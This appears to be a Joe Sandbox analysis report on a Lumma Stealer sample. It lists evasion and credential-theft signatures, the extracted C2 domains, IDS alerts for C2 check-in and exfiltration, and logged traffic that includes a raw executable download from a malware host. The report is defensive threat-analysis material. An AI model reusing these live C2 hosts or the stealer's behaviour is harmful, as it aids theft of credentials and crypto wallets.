Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560645
MD5:27fa50c74212925790649267140710f1
SHA1:0c82522e6f1d877c1b8a49ea16f7cceaee1a78fe
SHA256:9abbadfacf4127efed4f72ec65c65c741cb4e1f99f71ce53f8ca65666fbb2b6c
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 27FA50C74212925790649267140710F1)
    • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1932,i,6400708159271862020,17994335093903247733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1996,i,9808520038763490769,5132435854326033979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["p3ar11fter.sbs", "processhol.sbs", "p10tgrace.sbs", "peepburry828.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1803965347.0000000001251000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1804145488.0000000001261000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 6568JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 6568JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:25:58.615154+010020283713Unknown Traffic192.168.2.449730172.67.155.248443TCP
              2024-11-22T04:26:00.643140+010020283713Unknown Traffic192.168.2.449731172.67.155.248443TCP
              2024-11-22T04:26:03.090889+010020283713Unknown Traffic192.168.2.449732172.67.155.248443TCP
              2024-11-22T04:26:05.421205+010020283713Unknown Traffic192.168.2.449733172.67.155.248443TCP
              2024-11-22T04:26:07.756352+010020283713Unknown Traffic192.168.2.449734172.67.155.248443TCP
              2024-11-22T04:26:10.828021+010020283713Unknown Traffic192.168.2.449735172.67.155.248443TCP
              2024-11-22T04:26:14.194126+010020283713Unknown Traffic192.168.2.449737172.67.155.248443TCP
              2024-11-22T04:26:20.513664+010020283713Unknown Traffic192.168.2.449742172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:25:59.321357+010020546531A Network Trojan was detected192.168.2.449730172.67.155.248443TCP
              2024-11-22T04:26:01.368243+010020546531A Network Trojan was detected192.168.2.449731172.67.155.248443TCP
              2024-11-22T04:26:21.234927+010020546531A Network Trojan was detected192.168.2.449742172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:25:59.321357+010020498361A Network Trojan was detected192.168.2.449730172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:26:01.368243+010020498121A Network Trojan was detected192.168.2.449731172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:25:58.615154+010020577311Domain Observed Used for C2 Detected192.168.2.449730172.67.155.248443TCP
              2024-11-22T04:26:00.643140+010020577311Domain Observed Used for C2 Detected192.168.2.449731172.67.155.248443TCP
              2024-11-22T04:26:03.090889+010020577311Domain Observed Used for C2 Detected192.168.2.449732172.67.155.248443TCP
              2024-11-22T04:26:05.421205+010020577311Domain Observed Used for C2 Detected192.168.2.449733172.67.155.248443TCP
              2024-11-22T04:26:07.756352+010020577311Domain Observed Used for C2 Detected192.168.2.449734172.67.155.248443TCP
              2024-11-22T04:26:10.828021+010020577311Domain Observed Used for C2 Detected192.168.2.449735172.67.155.248443TCP
              2024-11-22T04:26:14.194126+010020577311Domain Observed Used for C2 Detected192.168.2.449737172.67.155.248443TCP
              2024-11-22T04:26:20.513664+010020577311Domain Observed Used for C2 Detected192.168.2.449742172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:26:22.804895+010020197142Potentially Bad Traffic192.168.2.449744185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:25:57.186382+010020577301Domain Observed Used for C2 Detected192.168.2.4644951.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:26:11.568197+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.155.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T04:26:14.198969+010028438641A Network Trojan was detected192.168.2.449737172.67.155.248443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.6568.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["p3ar11fter.sbs", "processhol.sbs", "p10tgrace.sbs", "peepburry828.sbs", "3xp3cts1aim.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeVirustotal: Detection: 45%Perma Link
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49763 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49830 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:64495 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49742 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49735 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49737 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49731 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49730 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49734 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49732 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49737 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 172.67.155.248:443
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 03:26:22 GMTContent-Type: application/octet-streamContent-Length: 2721792Last-Modified: Fri, 22 Nov 2024 03:06:55 GMTConnection: keep-aliveETag: "673ff54f-298800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 05 bd 29 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6a 64 64 79 74 78 75 00 40 29 00 00 a0 00 00 00 28 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 65 66 78 78 62 69 7a 00 20 00 00 00 e0 29 00 00 04 00 00 00 62 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 66 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 172.67.155.248 172.67.155.248
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.155.248:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pDmcNf2Vnao8OO7&MD=UZBBkmrN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pDmcNf2Vnao8OO7&MD=UZBBkmrN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
